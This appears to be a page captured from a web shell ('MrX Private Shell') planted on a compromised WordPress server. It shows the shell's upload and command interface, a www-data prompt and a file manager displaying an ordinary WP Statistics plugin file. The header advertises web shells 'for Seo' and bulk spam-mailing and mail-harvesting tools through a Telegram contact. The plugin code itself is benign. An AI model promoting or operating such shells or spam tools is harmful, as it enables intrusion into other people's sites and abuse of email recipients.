__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

namespace WP_Statistics\Service\Admin\MiniChart;

use WP_STATISTICS\Helper;
use WP_STATISTICS\Option;
use WP_STATISTICS\TimeZone;

class MiniChartHelper
{
    /**
     * Is Mini-chart add-on active?
     *
     * @var bool
     */
    private $isMiniChartActive = false;

    /**
     * Chart Metric
     *
     * @var string Either `visitors` or `views`.
     */
    private $metric = 'views';

    /**
     * An array of simple `Y-m-d` dates from `date_range` days ago to today.
     *
     * @var array
     */
    private $chartDates = [];

    public function __construct()
    {
        $this->isMiniChartActive = Helper::isAddOnActive('mini-chart');
    }

    /**
     * Returns Mini-chart add-on's active status.
     *
     * @return bool
     */
    public function isMiniChartActive()
    {
        return $this->isMiniChartActive;
    }

    /**
     * Returns selected "Chart Metric" option.
     *
     * @return string Either `visitors` or `views`. Default: `views`.
     */
    public function getChartMetric()
    {
        $metric = $this->metric;

        if ($this->isMiniChartActive()) {
            $metric = Option::getByAddon('metric', 'mini_chart', 'views');
        }

        return apply_filters('wp_statistics_mini_chart_metric', $metric);
    }

    /**
     * Returns selected "Chart Date Range" option.
     *
     * @return int Either 7, 14, 30, 90 or 180. Default: 14.
     */
    public function getChartDateRange()
    {
        if (!$this->isMiniChartActive()) {
            return 14;
        }

        return intval(Option::getByAddon('date_range', 'mini_chart', '14'));
    }

    /**
     * Returns selected "Count Display" option.
     *
     * @return string Either `disabled`, `date_range` or `total`. Default: `total`.
     */
    public function getCountDisplay()
    {
        if (!$this->isMiniChartActive()) {
            return 'total';
        }

        return Option::getByAddon('count_display', 'mini_chart', 'total');
    }

    /**
     * Returns color of the chart.
     *
     * @return string Hex code.
     */
    public function getChartColor()
    {
        if (!$this->isMiniChartActive()) {
            return '#7362BF';
        }

        return Option::getByAddon('chart_color', 'mini_chart', '#7362BF');
    }

    /**
     * Returns either 'Visitors' or 'Views' depending on the selected options.
     *
     * @return string
     */
    public function getLabel()
    {
        return $this->getChartMetric() === 'visitors' ? __('Visitors', 'wp-statistics') : __('Views', 'wp-statistics');
    }

    /**
     * Returns `chartDates` array (and creates the array if it's empty).
     *
     * @param int $forceDays Ignore `date_range` option and send dates for the past x days.
     * @param string $minDate Ignore all dates before this date (e.g. You can pass post publish date here). Format `Y-m-d`.
     *
     * @return array An array of simple `Y-m-d` dates from `date_range` days ago to today.
     */
    public function getChartDates($forceDays = 0, $minDate = '')
    {
        // Return `$chartDates` if it already has data (and `$forceDays` and `$minDate` are empty)
        if (!empty($this->chartDates) && !intval($forceDays) && empty($minDate)) {
            return $this->chartDates;
        }
        $chartDates = [];

        // Fill `$chartDates` in reveresed order (oldest date is at the beginning of the array)
        $daysAgoStartIndex = intval($forceDays) ? intval($forceDays) - 1 : $this->getChartDateRange() - 1;
        for ($i = $daysAgoStartIndex; $i >= 0; $i--) {
            $date = TimeZone::getTimeAgo($i);
            // Add `$date` if `$minDate` is not passed or if `$minDate` is less than `$date`
            if (empty($minDate) || $minDate < $date) {
                $chartDates[] = $date;
            }
        }

        // Cache `$chartDates` as a class attribute only if the method was called without `$forceDays` or `$minDate`
        if (!intval($forceDays) && empty($minDate)) {
            $this->chartDates = $chartDates;
        }

        return $chartDates;
    }
}

Filemanager

Name Type Size Permission Actions
MiniChartHelper.php File 4 KB 0644
Filemanager